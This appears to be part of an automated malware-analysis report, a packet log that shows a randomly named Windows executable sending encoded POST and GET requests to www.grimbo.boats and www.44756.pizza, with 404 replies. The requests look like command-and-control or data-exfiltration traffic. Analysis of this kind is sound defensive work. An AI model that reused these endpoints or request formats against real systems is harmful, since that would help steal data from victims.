                                              Jan 2, 2025 09:19:14.208785057 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                              Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.649988172.67.182.198803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:19.254493952 CET739OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 207
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 73 51 30 4f 42 6f 75 7a 79 44 53 76 39 48 45 6b 79 34 48 53 51 58 52 6d 56 62 4d 4e 74 4b 30 38 34 79 4b 72 38 66 76 68 4a 59 6a
                                              Data Ascii: 58=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4sQ0OBouzyDSv9HEky4HSQXRmVbMNtK084yKr8fvhJYj
                                              Jan 2, 2025 09:19:19.896518946 CET1094INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:19 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOdK1ZM42PiAvXvgiRU6h%2B8AicrJM9qqRQYwo%2B40e%2Bo56zd5CdJcoCP%2F%2Fo7ox17I96KCb58CdN%2F2thd4SO6%2FuRYGCkRI7rgLl14cOu7KFqXGaiC%2BlLf8VFq0Cgq2ggMhiaCO"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8fb952cfdcbe43fb-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2342&min_rtt=2342&rtt_var=1171&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.649989172.67.182.198803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:21.810206890 CET763OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 231
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 33 54 6d 58 44 2b 4e 4e 4b 65 2b 34 4b 4b 35 72 54 49 75 39 39 41 74 4d 43 6b 58 33 79 66 4f 37 35 69 62 32 6d 47 4b 6d 61 42 6d 41 3d 3d
                                              Data Ascii: 58=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA3TmXD+NNKe+4KK5rTIu99AtMCkX3yfO75ib2mGKmaBmA==
                                              Jan 2, 2025 09:19:22.442451000 CET1083INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:22 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKNgFEPtyw8O1mws3Z0TcjFetIMuDUI7Lk%2Fw3k5jRkvtCxEmYrcG5GWvG9cWQVKfAqtcBFg%2BlaNiCDYh47dIcKiX7ESWq6UQ1zXaOjeKA0cLT07LiiIh33mKHDwBXlWuQTFI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8fb952dfb9e18c06-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1745&rtt_var=872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=763&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.649990172.67.182.198803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:24.367449999 CET1776OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 1243
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 66 74 69 50 79 48 76 41 49 34 62 77 72 49 2f 41 7a 62 45 49 44 6f 2b 4c 71 4c 2b 39 62 6b 6e 38 46 4a 6a 35 36 77 63 47 62 74 4a 35 46 35 43 77 50 56 45 6c 4c 73 77 71 4e 48 33 42 7a 32 39 6a 53 73 54 39 64 4b 4b 50 74 59 58 62 35 2f 47 36 63 45 45 48 51 34 75 53 75 4b 75 33 41 51 38 49 76 68 72 76 43 56 36 6a 53 66 35 64 63 35 68 49 6d 53 6e 2b 78 32 33 31 58 44 37 54 31 6e 33 67 74 48 36 35 36 31 37 66 78 5a 6b 78 31 73 44 4b 42 51 2f 71 78 41 61 39 6d 4f 78 31 43 31 34 33 38 6b 58 55 79 [TRUNCATED]
                                              Data Ascii: 58=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoAftiPyHvAI4bwrI/AzbEIDo+LqL+9bkn8FJj56wcGbtJ5F5CwPVElLswqNH3Bz29jSsT9dKKPtYXb5/G6cEEHQ4uSuKu3AQ8IvhrvCV6jSf5dc5hImSn+x231XD7T1n3gtH65617fxZkx1sDKBQ/qxAa9mOx1C1438kXUyJFQai1icNYjKfCK1gYUSDhK+lyIp9wuxvzHPIFB3iBCF+hFQVhgpUY/wflJo83Bp60CJgg5TCKmkQIbRMU8kyXWb2QsrH/F02/Z6k1uEcd+/sVT5AM+bRzEeHB2SW6bUy34BjGBnIr5MnpE/awyg5mIfMJHzuNB/nrQfxom07mttvMmuDxsUz8GhE07VO8D5oGOZFuUhEp8pRVUZJ64FlvKguDKTjcWrJV9s9GUPbUdBUXogfl3q2TrK5VhS+GnMt56sJy3rwRtqr7gj9S4xpCFwXOg86066m4NxfMs4qWuFCBYJhdgITxmz6NwH2ZaDA/kG5nodoac+Yd7ETjMwR6+yO+IDWliM91CkbHQq1sNoqTIzBWpRCUvUeBib0nxw0WiyxgFGmuRMkBhA8EcR5WZWRTSJ2VAeilqD7Z/qT3s7r/JQy50u1s3P+c+xt0vDp2OP1DdaCIAaGqu3kIGeSDNbK0FxQnLnM0HOFkHksWPVHSvTt0dSFAosX4SNrC4booc/ga7zboDconzTBIXJgxAHMLJd6MMt/n1cUVuMGmXs7Wkr4LDbYmYTOwEHuk92PmnrJ16p7q3gWH0gSxtT61e69LQI2zeGXDQupj8fUNmngNq5/+QJtDd0UebY8XwXrPifpHava5JD6ovtCcQBg8i1X+V4nA4y8t [TRUNCATED]
                                              Jan 2, 2025 09:19:25.027806997 CET1088INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:24 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJeRBCSme9uvL5%2Fi2hjmfO7b9w6nvPda3ttuoCQNRnQ2XJoskejT8uSJWtzSL4BxrAPY73ln7oxvukVg0z3jyVc5F0NyM3FdxeuDEDUvehRuiDbaxtocWx4u6IvhcE2qai%2B8"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8fb952efbd0d4302-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2049&min_rtt=2049&rtt_var=1024&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1776&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.649991172.67.182.198803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:26.905824900 CET491OUTGET /kxtt/?58=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&AZhlI=2P00kRyHXnBDvT HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.grimbo.boats
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 2, 2025 09:19:27.554383993 CET1100INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:27 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzqIqzX92jE6psuJdJaXjaWEPeLn0XkphZiy9Q7dtfZxPnJRr43f5D6RKNhQUju2LhCtwXGIUSJILLwoeNRM5tQBpVkw3xVhhgYvxhaoKFmSCNz66Tl%2B6S6qQryKSFs6m2RI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8fb952ffaa128c15-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.649992154.21.203.24803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:32.889954090 CET736OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 207
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 41 42 2b 77 38 4a 54 49 4a 52 65 69 53 56 57 35 63 6a 70 33 59 58 64 39 58 56 64 2f 46 7a 47 5a 2f 47 59 34 67 65 43 52 42 41 73
                                              Data Ascii: 58=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpAB+w8JTIJReiSVW5cjp3YXd9XVd/FzGZ/GY4geCRBAs
                                              Jan 2, 2025 09:19:33.773566961 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Thu, 02 Jan 2025 08:19:33 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.649993154.21.203.24803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:35.446312904 CET760OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 231
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 33 66 39 56 4e 76 2f 6c 7a 73 62 2f 2b 59 71 33 53 6c 65 31 6c 50 63 78 33 37 4b 56 4c 63 79 5a 55 41 37 42 31 35 33 69 45 45 5a 67 3d 3d
                                              Data Ascii: 58=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI3f9VNv/lzsb/+Yq3Sle1lPcx37KVLcyZUA7B153iEEZg==
                                              Jan 2, 2025 09:19:36.321973085 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Thu, 02 Jan 2025 08:19:36 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.649994154.21.203.24803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:37.990911007 CET1773OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 1243
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
